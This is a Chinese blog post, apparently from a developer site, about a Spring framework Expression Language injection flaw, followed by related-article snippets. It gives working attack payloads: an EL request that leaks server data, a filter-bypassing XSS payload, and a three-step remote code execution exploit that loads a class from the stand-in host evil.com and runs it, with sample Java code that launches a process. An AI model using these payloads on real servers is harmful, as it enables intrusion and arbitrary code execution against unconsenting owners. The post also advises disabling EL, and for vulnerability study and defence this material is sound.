Spring爆远程代码执行漏洞(含EXP)

最新推荐文章于 2024-08-07 19:33:53 发布
最新推荐文章于 2024-08-07 19:33:53 发布
阅读量2.6k 收藏
点赞数

上周也就是在1月16日左右,安全公司Aspect Security透露在Spring框架的开发代码中,发现了一个重大的安全漏洞。该漏洞被命名为“remote code with Expression Language injection”。他们发现,通过发送特定的Spring标签,可以导致服务器上的敏感数据暴露、执行任意代码等。(PS:该漏洞早在2011年就发现了,只是未对外公布。)

威廉姆斯称,Spring未来版本中将有可能默认不启用表达式语言功能,但是,目前存在的这个漏洞,如果被攻击者利用,可能会对应用程序产生大的威胁。这是非常危险的,攻击者可以完全接管一个Web应用程序,并在服务器上运行他们的代码。他还指出,该漏洞跟最近披露的浏览器Java漏洞无任何联系。

据提供开源组件的中央仓库Sonatype数据显示,目前已有超过2.2万个机构下载了超过130万次存在安全漏洞的Spring框架。

下面节选了部分在Glassfish+EL 2.2远程执行代码的列子,完整Paper查看地址

0×01:
发起请求如下:

http://vulnerable.com/foo?message=${applicationScope}

页面如果包含

<spring:message text="" code="${param['message']}"></spring:message>

会导致输出服务器的一些敏感信息,包括classpath和本地工作目录等。

0×02:
当应用程序做了过滤器,会对所有’<’和’>’进行过滤。利用Expression Language特性,可尝试如下绕过过滤:

http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPPP

发起该请求之后,当String.replaceAll方法被调用的时候。该语句会返回一段文本,并插入spring:message tag,返回的错误代码中会显示QQQQQQ。

最终成功执行XSS,绕过过滤器的语句如下:

http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”<”).replaceAll(“Q”,”>”)}&foo=PscriptQalert(1);P/scriptQ

根据老外放出的Paper,我们可以看到能成功执行任意代码。但是到目前为止,还没有任何快速修复补丁放出。因此,使用Spring框架的应用程序可能存在安全隐患,建议开发者关闭表达式语言功能。

补充:

0×03:远程执行EXP

1.建立一个ArrayList以构造一个URLClassLoader,并且需要在session中存着,可以在后面利用。

${pageContext.request.getSession().setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}

2.通过URL对象载入远程执行的代码类

${pageContext.request.getSession().getAttribute("arr").add(pageContext.getServletContext().getResource("/").toURI().create("http://evil.com/path/to/where/malicious/classfile/is/located/").toURL())}

远程执行的代码类(运行一个计算器)

public class Malicious {
       public Malicious() { 
	   try {
                     java.lang.Runtime.getRuntime().exec("open -a Calculator"); //Mac
                     java.lang.Runtime.getRuntime().exec("calc.exe"); //Win
              } catch (Exception e) {    
              }
       }
}

3.执行代码,打开一个计算器(运行结果截图见上文)

${pageContext.getClass().getClassLoader().getParent().newInstance(pageContext.request.getSession().getAttribute("arr").toArray(pageContext.getClass().getClassLoader().getParent().getURLs())).loadClass("Malicious").newInstance()}

关于Spring

Spring是一个开源框架,Sping 是于2003 年兴起的一个轻量级的Java 开发框架,由Rod Johnson 在其著作Expert One-On-One J2EE Development and Design中阐述的部分理念和原型衍生而来。它是为了解决企业应用开发的复杂性而创建的。Spring使用基本的JavaBean来完成以前只可能由EJB完成的事情。然而,Spring的用途不仅限于服务器端的开发。


cnbird2008
关注
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
做自己喜欢的事,并将其发挥到极致!
04-07 1475
文章目录声明前言一、漏洞详情二、影响版本三、漏洞复现四、漏洞原理分析五、修复方法(仅供参考) 声明 本文章仅用做漏洞复现和技术研究,切勿非法渗透攻击,造成一切后果与本作者无关,切记! 前言 Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。 一、漏洞详情 Spring Framework 是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为J2EE应用程序开发提供一个好用的框架。 这个漏洞的主要原因是在JDK 9+版本
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1705
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码
spring-messaging远程代码执行漏洞(CVE-2018-1270)复现
玄道的网安博客
01-07 1535
漏洞概述 Spring框架中通过spring-messaging模块来实现STOMP(Simple Text-Orientated Messaging Protocol),STOMP是一种封装WebSocket的简单消息协议。攻击者可以通过建立WebSocket连接并发送一条消息造成远程代码执行 影响版本 Spring Framework 5.0 to 5.0.4 Spring Framework 4.3 to 4.3.14 环境搭建 拉取环境 docker ...
Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
jidunkeji的博客
04-06 4682
前言 上周网上Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。 1►前置知识 1.1 SpringMVC参数绑定 为了方便编程,SpringMVC支持将HTTP请求中的的请求参数或者请求体内容,根据Controller方法的参数,自动完成类型转换和赋值。之后,Controller方法就可以直接使用这些参数,避免了需要编写大
Spring框架漏洞(附修复方法)
最新发布
C233333235的博客
08-07 869
Spring是Java EE编程领域的一个轻量级开源框架,该框架由一个叫Rod Johnson的程序员在2002年最早提出并随后创建,是为了解决企业级编程开发中的复杂性,业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用,实现敏捷开发的应用型框架。框架的主要优势之一就是其分层架构,分层架构允许使用者选择使用哪一个组件,同时为J2EE应用程序开发提供集成的框架。
Spring远程命令执行漏洞的简单概要
m0_50579386的博客
04-10 335
2022 年 3 月 31日,国家信息安全漏洞共享平台(CNVD)收录了 Spring 框架远程命令执行漏洞,并发布了关于 Spring 框架存在远程命令执行漏洞的安全公告,安全公告编号:CNTA-2022-0009,POC、EXP漏洞利用细节已经公开,建议受影响的用户自查安全工作。
Spring Web Flow 远程代码执行漏洞分析
weixin_67271870的博客
11-23 604
漏洞在2017年5月31号被提交到平台,官方并没有详细的信息,通过官方描述和补丁的对比,我们可以大致推断应该是Spring WebFlow在Model的数据绑定上面,由于没有明确指定相关model的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行漏洞,这个漏洞利用除了版本的限制之外还有两个前置条件,这两个前置条件中有一个是默认配置,另外一个就是编码规范了,漏洞能不能利用成功主要就取决于后面的条件。
exp入手分析漏洞
weixin_30810583的博客
07-26 360
分析poc和分析exp有一些不一样,因为exp是人为构造后的东西,它会执行一段自定的shellcode。结果是根本不会触发异常或者异常在离触发点十万八千里的地方。这样分析poc的技巧就用不上了(因为无法有效的定位到漏洞触发的第一现场)。但是可以从exp的功能入手,观察一下exp的行为比如创建文件、创建进程之类的。可以从行为找出关键的API进行下断。 1.分析shellcode的功能,对其中的关键...
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9885
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
Spring RCE远程执行漏洞(CVE-2022-22965)
tpaer的博客
10-18 2589
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞
远程命令行执行工具
12-19
VS2010编写,可以在运行了服务端的机子上执行命令行,并将执行结果返回客户端
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
Spring远程代码执行漏洞(CVE-2017-4971)
tbygadgjsad的博客
03-17 714
运行测试环境:docker-compose up -d 等待环境启动后,访问http://ip:8080,将看到一个酒店预订的页面 首先访问http://ip:8080/login,用页面左边给出的任意一个账号/密码登录系统: 然后访问id为1的酒店http://ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了): 再点击确认“Confirm”:进行抓包 ...
Spring 远程命令执行漏洞分析(CVE-2022-22965)
weixin_43263451的博客
08-14 4122
最近想学习学习spring框架方面的漏洞。刚好今年上半年了一个spring框架的远程命令执行漏洞,随即赶紧来分析一波这个漏洞总的来说是因为:通过spring参数绑定处存在的缺陷使得可以修改tomcat的日志记录相关类AccessLogValve的成员变量从而达到修改tomcat日志记录的配置,最终导致写入jsp马class.module.classLoader.resources.context.parent.pipeline.first.pattern=此处为webshell内容............
【干货】Spring远程命令执行漏洞(CVE-2022-22965)原理分析和思考
小司机的奥拓
07-22 838
上周网上Spring框架存在RCE漏洞,野外流传了一小段时间后,Spring官方在3月31日正式发布了漏洞信息,漏洞编号为CVE-2022-22965。本文章对该漏洞进行了复现和分析,希望能够帮助到有相关有需要的人员进一步研究。##
什么是EXP漏洞
qq_44833342的博客
05-29 944
EXP漏洞概念
路由器漏洞 EXP 开发实践
hl1293348082的专栏
05-30 1842
测试环境 Debian 9 Qemu 本文主要以 CVE-2013-0230 漏洞为例,讲解路由器上缓冲区漏洞exp 编写。 0x01 环境搭建 使用 firmware-analysis-toolkit firmware-analysis-toolkit https://github.com/attify/firmware-analysis-toolkit 是模拟固件和分析安全漏洞的工具。 该工具可以自动的解压固件和创建 image 使用 qemu 来模拟路由器。 在本文
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
06-06
好的,我知道你的问题了。针对你提到的这个问题,我可以给你一些解释和分析。 首先,RMI(Remote Method Invocation)是Java远程调用机制的一种实现方式,它允许在不同的JVM进程之间进行Java对象的传输和远程调用。而反序列化(Deserialization)是将二进制数据转换为Java对象的过程。在Java中,对象的序列化和反序列化是通过ObjectInputStream和ObjectOutputStream类来实现的。 RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的序列化数据来绕过Java的安全机制,从而执行任意代码。 而Spring框架的反序列化远程代码执行漏洞,则是指攻击者可以通过构造恶意的序列化数据,使得Spring框架在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的影响范围非常广泛,涵盖了Spring框架的多个版本,包括Spring MVC、Spring WebFlow、Spring Data等。 总的来说,RMI远程反序列化RCE漏洞Spring框架的反序列化远程代码执行漏洞都是Java序列化机制的设计缺陷所导致的安全漏洞。攻击者可以通过构造恶意的序列化数据来绕过Java的安全机制,从而执行任意代码。因此,在开发Java应用程序时,需要注意对序列化和反序列化数据的处理,避免出现安全漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值